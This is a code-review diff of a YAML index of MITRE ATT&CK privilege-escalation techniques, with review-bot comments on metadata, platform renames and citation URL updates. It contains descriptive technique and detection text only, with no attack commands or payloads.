@@ -17323,9 +17656,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17334,7 +17667,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17387,7 +17719,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17408,12 +17740,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17516,7 +17847,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17616,12 +17946,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17634,7 +17963,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17647,7 +17975,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17677,7 +18004,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
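Review bot: for T1547.009 the three hunks above read as deletions but are really a single move plus bump: `x_mitre_attack_spec_version: 2.1.0` and `x_mitre_modified_by_ref` are removed from their old positions and re-added together after `object_marking_refs` with the spec version raised to `3.2.0`. The content version stays at `'1.2'` while `modified` advances to `2024-10-15`, which is fine because the attack spec version is a schema version, not a content version; a one-line note in the PR description that these objects were re-serialised in upstream key order would save the next reviewer from reading each of these as a real removal.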
@@ -17704,7 +18032,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17730,13 +18058,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17813,12 +18139,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17837,6 +18162,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -17844,7 +18170,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -17864,34 +18189,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
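Review bot: in the T1574.008 reference hunk the only substantive changes are the two `msdn.microsoft.com/en-us/library/...` links for `CreateProcess` and `WinExec` being replaced with their `learn.microsoft.com` equivalents and the retrieval dates refreshed to September 12, 2024; the `Microsoft Environment Property` and `Windows NT Command Shell` entries move position but are otherwise unchanged, and `revoked: false` plus the `3.1.0` to `3.2.0` spec bump are added. The reorder makes this hunk look larger than it is, so it helps to say in the PR description that the reference list now follows upstream ordering; the `x_mitre_version: '1.0'` left untouched is correct since a citation URL refresh does not change technique content.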
@@ -17927,6 +18254,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -17938,16 +18269,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
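Review bot: this hunk and the one before it change no values for T1484.001; `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique` and `x_mitre_platforms` are simply moved to different positions in the object. That is harmless for any YAML consumer, but it inflates the diff and hides the real changes in this object (the `modified` date, the two harmj0y URL updates and the `3.1.0` to `3.2.0` spec bump); if the emitter now preserves upstream key order, stating that once in the PR description lets reviewers skip the pure-reorder hunks.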
@@ -17983,12 +18310,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -17996,14 +18323,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18018,6 +18344,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -18026,18 +18353,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -18069,9 +18396,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18143,7 +18467,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18170,7 +18493,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -18196,13 +18519,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -18323,12 +18644,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18360,11 +18680,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -18405,11 +18724,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -18465,12 +18783,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18527,7 +18844,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18597,7 +18913,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18707,7 +19022,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -18761,7 +19075,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18794,13 +19108,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
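Review bot: after this hunk T1546.012 carries neither `spec_version` nor any `x_mitre_attack_spec_version`, because both lines are removed with no replacement, while neighbouring objects keep `x_mitre_attack_spec_version: 3.2.0` (T1547.004 and T1098.004 above). The same removal without replacement is applied to T1055.013, T1574.005, T1055.004, T1546.009, T1055.002 and T1547.015 further down, so the file ends up with a mix of objects that declare an ATT&CK spec version and objects that declare none. If the intent is that 2.1.0-era objects are unchanged content, keep the `x_mitre_attack_spec_version: 2.1.0` line; if the generator is meant to normalise them, emit the current value consistently, as happens for T1546.001 later in this patch where the removed 2.1.0 line is re-added as 3.2.0.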
@@ -18862,10 +19174,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
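Review bot: the platform list for T1548.005 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`, with `x_mitre_version` bumped 1.1 to 1.2 and `modified` advanced to 2024-10-15, which matches the ATT&CK v16 platform consolidation. Anything that selects techniques from this index by the old platform strings will stop matching this technique after the change, so any per-platform index derived from these platform values should be regenerated in the same commit rather than left to drift.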
@@ -18923,7 +19234,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -18965,7 +19275,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -19024,8 +19334,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -19055,7 +19363,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
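Review bot: `modified` for T1574.005 rolls back from 2020-10-27 to 2020-03-26 here, the same rollback pattern as on the T1546.012 hunk above. Separately, the retained context lines for the Kanthak citation read `(2015, December 8)` followed by `Retrieved December 4, 2014`, a retrieval date earlier than the publication date. That inconsistency is not introduced by this change, but since the object is being regenerated anyway it is worth checking against the upstream ATT&CK source rather than carrying it forward.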
@@ -19090,12 +19398,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19172,7 +19478,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19211,7 +19516,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19260,8 +19565,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19293,7 +19596,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19341,13 +19644,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19360,16 +19661,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19381,16 +19682,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
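Review bot: for T1098.005 the platforms drop `Azure AD` and `SaaS` and add `Identity Provider`, with `Windows` kept, `x_mitre_version` bumped 1.2 to 1.3 and a contributor added; that is consistent with the Azure AD to Entra ID wording change in the description hunk above. `Identity Provider` only exists as a platform from ATT&CK v16 onward, so this confirms the generator's source bundle is v16 or later, and the older-looking `modified` values elsewhere in this file need to be explained against that same bundle. Dropping `SaaS` narrows the stated platform coverage even though the description still discusses registering devices in an MFA system; that is an upstream modelling decision, not something to change in the index, but worth knowing when mapping detections to platforms.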
@@ -19445,7 +19746,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19468,7 +19768,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19512,8 +19812,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
